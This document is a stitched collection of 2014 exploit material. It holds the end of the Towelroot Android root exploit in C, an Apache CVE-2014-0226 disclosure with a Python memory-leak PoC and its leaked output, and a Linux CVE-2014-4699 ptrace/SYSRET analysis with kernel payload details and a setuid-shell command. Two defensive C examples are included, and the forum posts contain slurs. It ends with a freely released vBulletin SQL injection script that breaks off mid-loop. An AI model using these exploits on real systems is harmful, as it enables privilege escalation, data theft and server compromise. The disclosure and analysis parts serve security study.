            }
        }
    }
    return NULL;
}

/* Loopback listener on port 5551 that make_socket() connects to. */
void *accept_socket(void *arg)
{
    int sockfd;
    int yes;
    struct sockaddr_in addr = {0};
    int ret;

    sockfd = socket(AF_INET, SOCK_STREAM, SOL_TCP);
    yes = 1;
    setsockopt(sockfd, SOL_SOCKET, SO_REUSEADDR, (char *)&yes, sizeof(yes));
    addr.sin_family = AF_INET;
    addr.sin_port = htons(5551);
    addr.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    bind(sockfd, (struct sockaddr *)&addr, sizeof(addr));
    listen(sockfd, 1);
    while (1) {
        ret = accept(sockfd, NULL, NULL);
        if (ret < 0) {
            printf("**** SOCK_PROC failed ****\n");
            while (1) {
                sleep(10);
            }
        } else {
            printf("i have a client like hookers.\n");
        }
    }
    return NULL;
}

/* Map the two fixed-address buffers (one above, one below the usual
 * mmap range) and start the listener, search and waiter threads. */
void init_exploit(void)
{
    unsigned long addr;
    pthread_t th1, th2, th3;

    printf("running with pid %d\n", getpid());
    pthread_create(&th1, NULL, accept_socket, NULL);

    addr = (unsigned long)mmap((void *)0xa0000000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC,
                               MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    addr += 0x800;
    MAGIC = addr;
    if ((long)addr >= 0) {
        printf("first mmap failed?\n");
        while (1) {
            sleep(10);
        }
    }

    addr = (unsigned long)mmap((void *)0x100000, 0x110000, PROT_READ | PROT_WRITE | PROT_EXEC,
                               MAP_SHARED | MAP_FIXED | MAP_ANONYMOUS, -1, 0);
    addr += 0x800;
    MAGIC_ALT = addr;
    if (addr > 0x110000) {
        printf("second mmap failed?\n");
        while (1) {
            sleep(10);
        }
    }

    pthread_mutex_lock(&done_lock);
    pthread_create(&th2, NULL, search_goodnum, NULL);
    pthread_create(&th3, NULL, send_magicmsg, NULL);
    pthread_cond_wait(&done, &done_lock);
    return;
}

int main(int argc, char **argv)
{
    g_argc = argc;
    if (argc >= 2) {
        /* bounded copy; the original strcpy could overrun rootcmd */
        snprintf(rootcmd, sizeof(rootcmd), "%s", argv[1]);
    }
    init_exploit();
    printf("\n");
    printf("done root command.\n");
    while (1) {
        sleep(10);
    }
    return 0;
}
Source: [C] Toweelroot - Pastebin.com
-
Apache HTTPd - description of the CVE-2014-0226.

From: funky.koval () hushmail com
Date: Mon, 21 Jul 2014 08:55:19 +0000

Hi there,

--[ 0. Sparse summary

Race condition between updating httpd's "scoreboard" and mod_status, leading to several critical scenarios like heap buffer overflow with user supplied payload and leaking heap, which can leak critical memory containing htaccess credentials, SSL certificate private keys and so on.

--[ 1. Prerequisites

Apache httpd compiled with MPM event or MPM worker. The tested version was 2.4.7 compiled with:

./configure --enable-mods-shared=reallyall --with-included-apr

The tested mod_status configuration in httpd.conf was:

SetHandler server-status
ExtendedStatus On

--[ 2. Race Condition

Function ap_escape_logitem in server/util.c looks as follows:

1908 AP_DECLARE(char *) ap_escape_logitem(apr_pool_t *p, const char *str)
1909 {
1910     char *ret;
1911     unsigned char *d;
1912     const unsigned char *s;
1913     apr_size_t length, escapes = 0;
1914
1915     if (!str) {
1916         return NULL;
1917     }
1918
1919     /* Compute how many characters need to be escaped */
1920     s = (const unsigned char *)str;
1921     for (; *s; ++s) {
1922         if (TEST_CHAR(*s, T_ESCAPE_LOGITEM)) {
1923             escapes++;
1924         }
1925     }
1926
1927     /* Compute the length of the input string, including NULL */
1928     length = s - (const unsigned char *)str + 1;
1929
1930     /* Fast path: nothing to escape */
1931     if (escapes == 0) {
1932         return apr_pmemdup(p, str, length);
1933     }

In the for-loop between lines 1921 and 1925 the function is computing the length of the supplied str (almost like strlen, but additionally it counts special characters which need to be escaped). As the comment in line 1927 says, the function computes the count of bytes to copy. If there's nothing to escape the function uses apr_pmemdup to duplicate the str. In our single-threaded mind everything looks good, but the tricky part starts when we introduce multi-threading.

Apache in MPM mode runs workers as threads; let's consider the following scenario:

1) ap_escape_logitem(pool, "\0") is called
2) the for-loop in line 1921 immediately escapes, because *s is \0 in the first loop run
3) a malicious thread changes the memory under *s to another value (something which is not \0)
4) apr_pmemdup copies that changed value to a new string and returns it

The output from ap_escape_logitem is considered to be a string; if the scenario above occurred, then the returned string would not be zeroed at the end, which may be harmful.

The mod_status code looks as follows:

833                     ap_rprintf(r, "%s%s"
834                                "%s\n\n",
835                                ap_escape_html(r->pool,
836                                               ws_record->client),
837                                ap_escape_html(r->pool,
838                                               ws_record->vhost),
839                                ap_escape_html(r->pool,
840                                               ap_escape_logitem(r->pool,
841                                                                 ws_record->request)));

The relevant call to ap_escape_html() is at line 839 after the evaluation of ap_escape_logitem(). The first argument passed to ap_escape_logitem() is in fact an apr pool associated with the HTTP request and defined in the request_rec structure. This code is a part of a larger for-loop where the code is iterating over worker_score structs, which is defined as follows:

 90 struct worker_score {
 91 #if APR_HAS_THREADS
 92     apr_os_thread_t tid;
 93 #endif
 94     int thread_num;
 95     /* With some MPMs (e.g., worker), a worker_score can represent
 96      * a thread in a terminating process which is no longer
 97      * represented by the corresponding process_score. These MPMs
 98      * should set pid and generation fields in the worker_score.
 99      */
100     pid_t pid;
101     ap_generation_t generation;
102     unsigned char status;
103     unsigned short conn_count;
104     apr_off_t conn_bytes;
105     unsigned long access_count;
106     apr_off_t bytes_served;
107     unsigned long my_access_count;
108     apr_off_t my_bytes_served;
109     apr_time_t start_time;
110     apr_time_t stop_time;
111     apr_time_t last_used;
112 #ifdef HAVE_TIMES
113     struct tms times;
114 #endif
115     char client[40];   /* Keep 'em small... but large enough to hold an IPv6 address */
116     char request[64];  /* We just want an idea... */
117     char vhost[32];    /* What virtual host is being accessed? */
118 };

The 'request' field in a worker_score structure is particularly interesting - this field can be changed inside the copy_request function, which is called by update_child_status_internal. This change may occur when mod_status is iterating over the workers at the same time ap_escape_logitem is called within a different thread, leading to a race condition. We can trigger this exact scenario in order to return a string without a trailing \0. This can be achieved by running two clients, one triggering the mod_status handler and a second sending random requests to the web server. Let's consider the following example:

1) mod_status iterates over workers invoking update_child_status_internal()
2) at some point for one worker mod_status calls ap_escape_logitem(pool, ws_record->request)
3) let's assume that ws_record->request at the beginning is "\0" literally at the first byte.
4) inside the ap_escape_logitem function the length of ws_record->request is computed, which is 1 (an empty string consisting of \0)
5) another thread modifies ws_record->request (in fact it's called ws->request in the update_child_status_internal function but it's exactly the same location in memory) and puts there e.g. "GET / HTTP/1.0"
6) the apr_pmemdup(pool, str, 1) in ap_escape_logitem copies the first byte from "GET / HTTP/1.0" - "G" in that case - and returns it.

apr_pmemdup looks as follows:

112 APR_DECLARE(void *) apr_pmemdup(apr_pool_t *a, const void *m, apr_size_t n)
113 {
114     void *res;
115
116     if (m == NULL)
117         return NULL;
118     res = apr_palloc(a, n);
119     memcpy(res, m, n);
120     return res;

It allocates memory using the apr_palloc function which returns "dirty" memory (note that apr_pcalloc overwrites allocated memory with NULs). So it's non-deterministic what's after the copied "G" byte. There might be a \0 or there might not. For now let's assume that the memory allocated by apr_palloc was dirty (containing random bytes).

7) ap_escape_logitem returns "G" .junk. "\0"

The value from the example above is then pushed to the ap_escape_html2 function which is also declared in util.c:

1860 AP_DECLARE(char *) ap_escape_html2(apr_pool_t *p, const char *s, int toasc)
1861 {
1862     int i, j;
1863     char *x;
1864
1865     /* first, count the number of extra characters */
1866     for (i = 0, j = 0; s[i] != '\0'; i++)
1867         if (s[i] == '<' || s[i] == '>')
1868             j += 3;
1869         else if (s[i] == '&')
1870             j += 4;
1871         else if (s[i] == '"')
1872             j += 5;
1873         else if (toasc && !apr_isascii(s[i]))
1874             j += 5;
1875
1876     if (j == 0)
1877         return apr_pstrmemdup(p, s, i);
1878
1879     x = apr_palloc(p, i + j + 1);
1880     for (i = 0, j = 0; s[i] != '\0'; i++, j++)
1881         if (s[i] == '<') {
1882             memcpy(&x[j], "&lt;", 4);
1883             j += 3;
1884         }
1885         else if (s[i] == '>') {
1886             memcpy(&x[j], "&gt;", 4);
1887             j += 3;
1888         }
1889         else if (s[i] == '&') {
1890             memcpy(&x[j], "&amp;", 5);
1891             j += 4;
1892         }
1893         else if (s[i] == '"') {
1894             memcpy(&x[j], "&quot;", 6);
1895             j += 5;
1896         }
1897         else if (toasc && !apr_isascii(s[i])) {
1898             char *esc = apr_psprintf(p, "&#%3.3d;", (unsigned char)s[i]);
1899             memcpy(&x[j], esc, 6);
1900             j += 5;
1901         }
1902         else
1903             x[j] = s[i];
1904
1905     x[j] = '\0';
1906     return x;
1907 }

If the string from the example above were passed to this function we should get the following code-flow:

1) in the for-loop started at line 1866 we count the length of the escaped string
2) because the 's' string contains junk (due to only one byte being allocated by the apr_palloc function), it may contain the '>' character. Let's assume that this is our case
3) after the for-loop at line 1866, 'j' is greater than 0 (at least one s[i] equals '>' as assumed above)
4) at line 1879 memory for the escaped 'd' string is allocated
5) the for-loop started at line 1880 copies string 's' to the escaped 'd' string BUT apr_palloc has allocated only one byte for 's'. Thus, for each i > 0 the loop reads random memory and copies that value to the 'd' string.

At this point it's possible to trigger an information leak vulnerability (see section 5). However, the 's' string may overlap with 'd', e.g.:

's' is allocated at 0 with contents s = "AAAAAAAA>"
'd' is allocated at 8, then s[8] = d[0].

If that were the case, then the for-loop would run forever (s[i] would never be \0 since it was overwritten in the loop by a non-zero byte). Forever... until it hits unmapped memory or a read-only area.

The part of the scoreboard.c code which may overwrite ws_record->request was discovered using tsan:

    #1 ap_escape_logitem ??:0 (exe+0x0000000411f2)
    #2 status_handler /home/akat-1/src/httpd-2.4.7/modules/generators/mod_status.c:839 (mod_status.so+0x0000000044b0)
    #3 ap_run_handler ??:0 (exe+0x000000084d98)
    #4 ap_invoke_handler ??:0 (exe+0x00000008606e)
    #5 ap_process_async_request ??:0 (exe+0x0000000b7ed9)
    #6 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b143e)
    #7 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
    #8 ap_run_process_connection ??:0 (exe+0x00000009d156)
    #9 process_socket event.c:0 (exe+0x0000000cc65e)
    #10 worker_thread event.c:0 (exe+0x0000000d0945)
    #11 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
    #12 :0 (libtsan.so.0+0x00000001b279)

  Previous write of size 1 at 0x7feff2b862b8 by thread T2:
    #0 update_child_status_internal scoreboard.c:0 (exe+0x00000004d4c6)
    #1 ap_update_child_status_from_conn ??:0 (exe+0x00000004d693)
    #2 ap_process_http_async_connection http_core.c:0 (exe+0x0000000b139a)
    #3 ap_process_http_connection http_core.c:0 (exe+0x0000000b177f)
    #4 ap_run_process_connection ??:0 (exe+0x00000009d156)
    #5 process_socket event.c:0 (exe+0x0000000cc65e)
    #6 worker_thread event.c:0 (exe+0x0000000d0945)
    #7 dummy_worker thread.c:0 (libapr-1.so.0+0x00000004bb57)
    #8 :0 (libtsan.so.0+0x00000001b279)

--[ 3. Consequences

The race condition described in section 2 may lead to:

- information leak, in the case when the string returned by ap_escape_logitem is not \0-terminated; the junk after the copied bytes may be valuable
- overwriting the heap with a user supplied value, which may imply code execution

--[ 4. Exploitation

In order to exploit the heap overflow bug it's necessary to get control over:

1) triggering the race-condition bug
2) allocating the 's' and 'd' strings in ap_escape_html2 so that they overlap
3) the part of 's' which doesn't overlap with 'd' (this string is copied over and over again)
4) overwriting the heap in order to get total control over the CPU or at least modify apache's handler code flow for our benefit

--[ 5. Information Disclosure Proof of Concept

-- cut
#! /usr/bin/env python

import httplib
import sys
import threading
import subprocess
import random

def send_request(method, url):
    try:
        c = httplib.HTTPConnection('127.0.0.1', 80)
        c.request(method, url);
        if "foo" in url:
            print c.getresponse().read()
        c.close()
    except Exception, e:
        print e
        pass

def mod_status_thread():
    while True:
        send_request("GET", "/foo?notables")

def requests():
    evil = ''.join('A' for i in range(random.randint(0, 1024)))
    while True:
        send_request(evil, evil)

threading.Thread(target=mod_status_thread).start()
threading.Thread(target=requests).start()
-- cut

Below are the information leak samples gathered by running the PoC against the testing Apache instance. Leaks include e.g. HTTP headers, htaccess content, httpd.conf content etc. On live systems with higher traffic the samples should be way more interesting.

$ ./poc.py | grep "" | grep -v AAAA | grep -v "{}" | grep -v notables
127.0.0.1 {A} []
127.0.0.1 {A.01 cu0 cs0
127.0.0.1 {A27.0.0.1} []
127.0.0.1 {A|0|10 [Dead] u.01 s.01 cu0 cs0
127.0.0.1 {A Û []
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ab><br />
127.0.0.1 {AAA}</i> <b>[127.0.1.1:19666]</b><br />
127.0.0.1 {A0.1.1:19666]</b><br />
127.0.0.1 {A§} []
127.0.0.1 {A cs0
127.0.0.1 {Adentity
127.0.0.1 {A HTTP/1.1} []
127.0.0.1 {Ape: text/html; charset=ISO-8859-1
127.0.0.1 {Ahome/IjonTichy/httpd-2.4.7-vanilla/htdocs/} []
127.0.0.1 {Aÿÿÿÿÿÿÿ} []
127.0.0.1 {Aanilla/htdocs/foo} []
127.0.0.1 {A0n/httpd-2.4.7-vanilla/htdocs/foo/} []
127.0.0.1 {A......................................... } []
127.0.0.1 {A-2014 16:23:30 CEST} []
127.0.0.1 {Acontent of htaccess
127.0.0.1 {Aver: Apache/2.4.7 (Unix)
127.0.0.1 {Aroxy:balancer://mycluster} []

We hope you enjoyed it.

Regards,
Marek Kroemeke, AKAT-1 and 22733db72ab3ed94b5f8a1ffcde850251fe6f466

P.S. Re http://1337day.com/exploits/22451 , srsly? Either fake and someone tries to impersonate http://people.apache.org/~jorton/ or shame on you mate.

Attachment: cve-2014-0226.txt

Source: Full Disclosure: Apache HTTPd - description of the CVE-2014-0226.
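The measure-then-copy pattern the mail describes in ap_escape_logitem, next to a snapshot-first version that can never hand back an unterminated string (the same idea as the eventual upstream fix, which copies the scoreboard record before formatting it). This is an added illustration, not Apache's or the mail authors' code: the shared slot, the hook standing in for the concurrent update_child_status_internal() writer, and the function names are constructed for the demo.

```c
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#define REQUEST_LEN 64   /* size of worker_score.request in the listing above */

/* Constructed stand-in for one worker's scoreboard slot (shared across threads). */
static char shared_request[REQUEST_LEN];

/* Called between "measure" and "copy" so the racy interleaving is deterministic. */
typedef void (*race_hook_t)(void);

/* Racy shape (ap_escape_logitem fast path): walk the live shared string to find
 * its length, then copy that many bytes from the live string. If the writer
 * runs in between (the hook), the copy picks up the new bytes but keeps the old
 * length: one byte, no terminator. Returns the byte count; *out gets the copy. */
size_t escape_logitem_racy(const char *str, race_hook_t between, char **out)
{
    const char *s = str;
    while (*s)
        s++;
    size_t length = (size_t)(s - str) + 1;   /* counts the NUL we just saw */

    if (between)
        between();                           /* writer thread wins the race here */

    char *res = malloc(length);              /* apr_pmemdup: uninitialised tail */
    memcpy(res, str, length);
    *out = res;
    return length;
}

/* Hardened shape: copy the fixed-size slot into a private buffer first, force a
 * terminator, and only then measure and duplicate. A concurrent writer can still
 * race the snapshot, but the result is always a terminated string of at most
 * REQUEST_LEN - 1 bytes, so later escaping loops cannot run off the end. */
size_t escape_logitem_snapshot(const char *slot, race_hook_t between, char **out)
{
    char snap[REQUEST_LEN];
    memcpy(snap, slot, REQUEST_LEN);
    snap[REQUEST_LEN - 1] = '\0';

    if (between)
        between();                           /* writer runs; snapshot is unaffected */

    size_t length = strlen(snap) + 1;
    char *res = malloc(length);
    memcpy(res, snap, length);
    *out = res;
    return length;
}

/* Simulated writer: update_child_status_internal() storing a new request line. */
static void writer_stores_request(void)
{
    strncpy(shared_request, "GET / HTTP/1.0", REQUEST_LEN - 1);
}

/* 1 if the first n bytes of buf contain a NUL terminator, 0 otherwise. */
int copy_is_terminated(const char *buf, size_t n)
{
    return memchr(buf, '\0', n) != NULL;
}

int main(void)
{
    char *racy, *safe;

    shared_request[0] = '\0';   /* slot starts empty, as in step 3 of the mail */
    size_t n1 = escape_logitem_racy(shared_request, writer_stores_request, &racy);
    printf("racy:     copied %zu byte(s), terminated=%d\n", n1, copy_is_terminated(racy, n1));

    shared_request[0] = '\0';
    size_t n2 = escape_logitem_snapshot(shared_request, writer_stores_request, &safe);
    printf("snapshot: copied %zu byte(s), terminated=%d\n", n2, copy_is_terminated(safe, n2));

    free(racy);
    free(safe);
    return 0;
}
```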
-
CVE-2014-4699: Linux Kernel ptrace/sysret vulnerability analysis

by Vitaly Nikolenko
Posted on July 21, 2014 at 6:52 PM

Introduction

I believe this bug was first discovered around 2005 and affected a number of operating systems (not just Linux) on Intel 64-bit CPUs. The bug is basically how the SYSRET instruction is used by 64-bit kernels in the system call exit path. Unlike its slower alternative IRET, SYSRET does not restore all regular registers, segment registers or rflags. This is why it's faster than IRET. I've released the PoC code (on Twitter last week) that triggers the #GP in SYSRET and overwrites the #PF handler, transferring the execution flow to the NOP sled mapped at a specific memory address in user-space. The following is my attempt to explain how this vulnerability is triggered.

First, let's take a step back to see what the SYSRET instruction actually does. According to AMD, SYSRET does the following:

- Load the instruction pointer (%rip) from %rcx
- Change the code segment selector to guest mode (this effectively changes the privilege level)

and this is exactly what it does on both Intel and AMD platforms. However, the difference between these two platforms comes into play when a general protection fault (#GP) is triggered. This fault is triggered if a non-canonical memory address ends up in %rcx upon executing the SYSRET instruction (since SYSRET loads %rip from %rcx). What is a non-canonical address? There are a few good explanations on the web (e.g., this link).

On AMD architectures, %rip is not assigned until after the privilege level has been changed back to guest mode (and #GP in user-space is not very interesting). However, on Intel architectures, the #GP fault is thrown in privileged mode (ring0). This also means that the current %rsp value is used in handling the #GP! Since SYSRET does not restore %rsp, the kernel has to perform this operation prior to executing SYSRET. By the time the #GP happens, the kernel would have already restored the %rsp value from the user-space %rsp. In summary, this means that if we can trigger #GP in SYSRET:

- #GP will execute in privileged mode
- #GP will use the stack pointer supplied by us from user-space

That's great, but how do we trigger the #GP fault in the first place? The %rip address loaded from %rcx would always be canonical. That's where ptrace comes into play. If you are not familiar with ptrace, this is a good place to start. In short, that's how debuggers stop a running process and let you change register values on-the-fly. Using ptrace we can change %rip and %rsp to arbitrary values. Most ptrace paths go via the interface that catches the process using the signal handler, which always returns with IRET. However, there are a few paths that can get caught with ptrace_event() instead of the signal path. Refer to the PoC code for an example of using fork() with ptrace to force such a path.

Exploitation

For the exploitation phase, I was using Ubuntu 12.04.0 LTS (3.2.0-23-generic) simply because that's what I had at the moment as my VM. I think it was mentioned that this issue would affect 2.6.x as well as 3.x branches.

To trigger the #GP fault in SYSRET we obviously need to set our %rip to a non-canonical address. In the PoC I'm using 0x8fffffffffffffff but any non-canonical address would work. The next step is to set the %rsp value. If we set it to a user-space address, we'll simply double fault. However, if we set it to a writable address in kernel-space, we can overwrite data on the stack. Let's take a look at the general_protection handler that we enter with an arbitrary %rsp pointer:

0xffffffff8165cba0 <general_protection>     data32 xchg %ax,%ax
0xffffffff8165cba3 <general_protection+3>   data32 xchg %ax,%ax
0xffffffff8165cba6 <general_protection+6>   sub    $0x78,%rsp
0xffffffff8165cbaa <general_protection+10>  callq  0xffffffff8165cd90 <error_entry>            [1]
0xffffffff8165cbaf <general_protection+15>  mov    %rsp,%rdi
0xffffffff8165cbb2 <general_protection+18>  mov    0x78(%rsp),%rsi
0xffffffff8165cbb7 <general_protection+23>  movq   $0xffffffffffffffff,0x78(%rsp)
0xffffffff8165cbc0 <general_protection+32>  callq  0xffffffff8165d040 <do_general_prote        [2]
0xffffffff8165cbc5 <general_protection+37>  jmpq   0xffffffff8165ce30 <error_exit>
0xffffffff8165cbca                          nopw   0x0(%rax,%rax,1)
...

When entering error_entry at [1], we overwrite a few entries on the stack (0x78(%rsp) to 0x8(%rsp)):

0xffffffff8165cd90 <error_entry>     cld
0xffffffff8165cd91 <error_entry+1>   mov    %rdi,0x78(%rsp)
0xffffffff8165cd96 <error_entry+6>   mov    %rsi,0x70(%rsp)
0xffffffff8165cd9b <error_entry+11>  mov    %rdx,0x68(%rsp)
0xffffffff8165cda0 <error_entry+16>  mov    %rcx,0x60(%rsp)
0xffffffff8165cda5 <error_entry+21>  mov    %rax,0x58(%rsp)
0xffffffff8165cdaa <error_entry+26>  mov    %r8,0x50(%rsp)
0xffffffff8165cdaf <error_entry+31>  mov    %r9,0x48(%rsp)
0xffffffff8165cdb4 <error_entry+36>  mov    %r10,0x40(%rsp)
0xffffffff8165cdb9 <error_entry+41>  mov    %r11,0x38(%rsp)
0xffffffff8165cdbe <error_entry+46>  mov    %rbx,0x30(%rsp)
0xffffffff8165cdc3 <error_entry+51>  mov    %rbp,0x28(%rsp)
0xffffffff8165cdc8 <error_entry+56>  mov    %r12,0x20(%rsp)
0xffffffff8165cdcd <error_entry+61>  mov    %r13,0x18(%rsp)
0xffffffff8165cdd2 <error_entry+66>  mov    %r14,0x10(%rsp)
0xffffffff8165cdd7 <error_entry+71>  mov    %r15,0x8(%rsp)
...

However, we can control all these registers (well, except for %rcx) via PTRACE_SETREGS (see the PoC for details):

// get current registers
ptrace(PTRACE_GETREGS, chld, NULL, &regs);
// modify regs
...
// set regs
ptrace(PTRACE_SETREGS, chld, NULL, &regs);

The general_protection handler then invokes the do_general_protection function at [2]:

Dump of assembler code for function do_general_protection:
   0xffffffff8165d040 <+0>:   push   %rbp
   0xffffffff8165d041 <+1>:   mov    %rsp,%rbp
   0xffffffff8165d044 <+4>:   sub    $0x20,%rsp
   0xffffffff8165d048 <+8>:   mov    %rbx,-0x18(%rbp)
   0xffffffff8165d04c <+12>:  mov    %r12,-0x10(%rbp)
   0xffffffff8165d050 <+16>:  mov    %r13,-0x8(%rbp)
   0xffffffff8165d054 <+20>:  callq  0xffffffff816647c0 <mcount>
   0xffffffff8165d059 <+25>:  testb  $0x2,0x91(%rdi)
   0xffffffff8165d060 <+32>:  mov    %rdi,%r12
   0xffffffff8165d063 <+35>:  mov    %rsi,%r13
   0xffffffff8165d066 <+38>:  je     0xffffffff8165d06f <do_general_protection+47>
   0xffffffff8165d068 <+40>:  callq  *0xffffffff81c177d8
   0xffffffff8165d06f <+47>:  mov    %gs:0xc500,%rbx                                   [3]
   0xffffffff8165d078 <+56>:  testb  $0x3,0x88(%r12)
   0xffffffff8165d081 <+65>:  je     0xffffffff8165d140 <do_general_protection+256>
...

At [3], the kernel will page fault when accessing %gs:0xc500, then double fault and crash. The question now is what we can do to prevent the kernel from crashing and possibly transfer execution flow to our mapped memory region in user-space. Well, let's just overwrite the #PF (Page Fault) handler in the IDT (Interrupt Descriptor Table) with a memory address that we control. In the PoC code, I've mapped the following memory region in user-space:

trampoline = mmap(0x80000000, 0x10000000, 7|PROT_EXEC|PROT_READ|PROT_WRITE, 0x32|MAP_FIXED|MAP_POPULATE|MAP_GROWSDOWN, 0, 0);

We then set our %rsp value to regs.rsp = idt.addr + 14*16 + 8 + 0xb0 - 0x78, i.e., the IDT start address + address of the #PF handler (14th entry, where each entry is 16 bytes) + 8 bytes (we need to overwrite offset 32..63 in the #PF entry with 0) + some padding. The Intel developer's manual (Vol 3A) provides a good explanation of the IDT structure.

In the PoC code, the %rdi value (which is set to 0, regs.rdi = 0x0000000000000000) will overwrite offset 32..63 in the #PF entry, leaving us with a memory address that points to user-space. On my test VM, this address is 0x8165cbd0, which is why we've mapped our user-space memory region at 0x800000000-0x900000000. I should point out that it's important to MAP_POPULATE when mapping this memory region so we don't trigger #PF on accessing our mapped user-space address, i.e., #PF will trigger a double fault in this case. Here's the excerpt from the mmap(2) man page:

MAP_POPULATE (since Linux 2.5.46)
    Populate (prefault) page tables for a mapping. For a file mapping, this causes read-ahead on the file. Later accesses to the mapping will not be blocked by page faults. MAP_POPULATE is supported for private mappings only since Linux 2.6.23.

Once the #PF is triggered, we'll land in our NOP sled. However, by that time, the IDT will be trashed. We've overwritten a few entries in the IDT including a number of critical handlers. In the PoC, there is an attempt to restore the IDT by setting the register values (%rdi, %rsi, %rdx, etc.) to the original values:

regs.rdi = 0x0000000000000000;
regs.rsi = 0x81658e000010cbd0;
regs.rdx = 0x00000000ffffffff;
regs.rcx = 0x81658e000010cba0;
regs.rax = 0x00000000ffffffff;
regs.r8  = 0x81658e010010cb00;
regs.r9  = 0x00000000ffffffff;
regs.r10 = 0x81668e0000106b10;
regs.r11 = 0x00000000ffffffff;
regs.rbx = 0x81668e0000106ac0;
regs.rbp = 0x00000000ffffffff;
regs.r12 = 0x81668e0000106ac0;
regs.r13 = 0x00000000ffffffff;
regs.r14 = 0x81668e0200106a90;
regs.r15 = 0x00000000ffffffff;

This code is obviously very kernel-specific. In the payload, we can then do the usual privilege escalation routine (commit_creds(prepare_kernel_cred(NULL))), followed by some syscall execution (e.g., setuid(0); cp /bin/sh .; chown root:root ./sh; chmod u+s ./sh). Or we could attempt to set the appropriate registers and IRET to user-space with a stack pointer of our choice.

Conclusion

There are a few things to note here. The PoC is very kernel-specific. Trashing the IDT is not a good approach (i.e., it affects the kernel stability). Since 3.10.x the IDT is read-only, so this approach would no longer work. What other kernel structs can we overwrite that would give us a more reliable (and possibly universal) way of exploitation? I would really appreciate any ideas here.

Vitaly Nikolenko

Source: Hashcrack - Vitaly Nikolenko
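The canonical-address rule behind the #GP the post relies on, and the kind of %rip validation a ptrace register setter can apply before accepting a PTRACE_SETREGS value. Added example, not the post's PoC and not kernel source: is_canonical(), ptrace_rip_acceptable() and USER_LIMIT_48 are illustrative names, and a 48-bit (4-level paging) address layout is assumed.

```c
#include <inttypes.h>
#include <stdint.h>
#include <stdio.h>

/* Assumed layout: 48 virtual address bits, user half ending just below
 * 0x0000800000000000. Illustrative constants, not the kernel's own. */
#define VA_BITS_48    48u
#define USER_LIMIT_48 0x0000800000000000ULL

/* An x86-64 address is canonical when bits 63..va_bits-1 are all copies of
 * bit va_bits-1, i.e. the value survives sign-extension from that bit. SYSRET
 * raises #GP when %rcx holds a non-canonical %rip, which is what the post's
 * PoC provokes with 0x8fffffffffffffff. */
int is_canonical(uint64_t addr, unsigned va_bits)
{
    unsigned shift = 64u - va_bits;
    uint64_t sext = (uint64_t)(((int64_t)(addr << shift)) >> shift);
    return sext == addr;
}

/* Defensive check for a caller-supplied %rip: refuse non-canonical values and
 * anything in the kernel half, so the value can never reach SYSRET in %rcx.
 * Returns 0 when accepted, -1 when rejected. The upstream fix for CVE-2014-4699
 * rejects ptrace-supplied %rip values at or above the user-space limit in the
 * same spirit (the exact limit there is TASK_SIZE_MAX, not this constant). */
int ptrace_rip_acceptable(uint64_t rip)
{
    if (!is_canonical(rip, VA_BITS_48))
        return -1;
    if (rip >= USER_LIMIT_48)
        return -1;
    return 0;
}

int main(void)
{
    /* Constructed sample values: the PoC's %rip, a kernel text address taken
     * from the post's disassembly, and two ordinary user-space addresses. */
    const uint64_t samples[] = {
        0x8fffffffffffffffULL,
        0xffffffff8165cba0ULL,
        0x0000000000400000ULL,
        0x00007fffffffffffULL,
    };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        printf("0x%016" PRIx64 "  canonical=%d  ptrace_rip=%s\n", samples[i],
               is_canonical(samples[i], VA_BITS_48),
               ptrace_rip_acceptable(samples[i]) == 0 ? "accept" : "reject");
    }
    return 0;
}
```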
-
Note: danyweb managed to discover it before the gypsies at 1337gay. And he didn't make it public, didn't try to sell it... Edit: I've added details.
-
Nope, let them make fools of themselves. As you can see, the exploit is TRIVIAL. And it's not useful, there are too few forums running vBulletin 5. I'll bring more details when I get to Bucharest.
-
Some idiots are trying to sell it: http://1337day.com/exploits/22452 For 2000 $. Gay

Here it is. Free.

[phpcode]<?php
/*
    Author: Nytro
    Powered by: Romanian Security Team
    Price: Free. Educational.
*/

error_reporting(E_ALL);
ini_set('display_errors', 1);

// Get arguments
$target_url = isset($argv[1]) ? $argv[1] : 'https://rstforums.com/v5';
$expression = str_replace('/', '\\/', $target_url);

// Function to send a POST request
function httpPost($url, $params)
{
    $ch = curl_init($url);
    curl_setopt($ch, CURLOPT_URL, $url);
    curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($ch, CURLOPT_HEADER, false);
    curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
    curl_setopt($ch, CURLOPT_POST, 1);
    curl_setopt($ch, CURLOPT_POSTFIELDS, $params);
    curl_setopt($ch, CURLOPT_HTTPHEADER, array(
        'User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:30.0) Gecko/20100101 Firefox/30.0',
        'Accept: application/json, text/javascript, */*; q=0.01',
        'X-Requested-With: XMLHttpRequest',
        'Referer: https://rstforums.com/v5/memberlist',
        'Accept-Language: en-US,en;q=0.5',
        'Cookie: bb_lastvisit=1400483408; bb_lastactivity=0;'
    ));
    $output = curl_exec($ch);
    if ($output == FALSE) print htmlspecialchars(curl_error($ch));
    curl_close($ch);
    return $output;
}

// Function to get string between two other strings
function get_string_between($string, $start, $end)
{
    $string = " " . $string;
    $ini = strpos($string, $start);
    if ($ini == 0) return "";
    $ini += strlen($start);
    $len = strpos($string, $end, $ini) - $ini;
    return substr($string, $ini, $len);
}

// Get version
print "\r\nRomanian Security Team - vBulletin 5.1.2 SQL Injection\r\n\r\n";
print "Version: ";
$result = httpPost($target_url . '/ajax/render/memberlist_items',
    'criteria[perpage]=10&criteria[startswith]="+OR+SUBSTR(user.username,1,1)=SUBSTR(version(),1,1)--+"+' .
    '&criteria[sortfield]=username&criteria[sortorder]=asc&securitytoken=guest');
$letter = 1;
while (strpos($result, 'No Users Matched Your Query') == false)
{
    $exploded = explode('<span class=\"h-left\">\r\n\t\t\t\t\t\t\t\t\t<a href=\"' . $expression . '\/member\/', $result);
    $username = get_string_between($exploded[1], '">', '<\/a>');
    print $username[0];
    $letter++;
    $result = httpPost($target_url . '/ajax/render/memberlist_items',
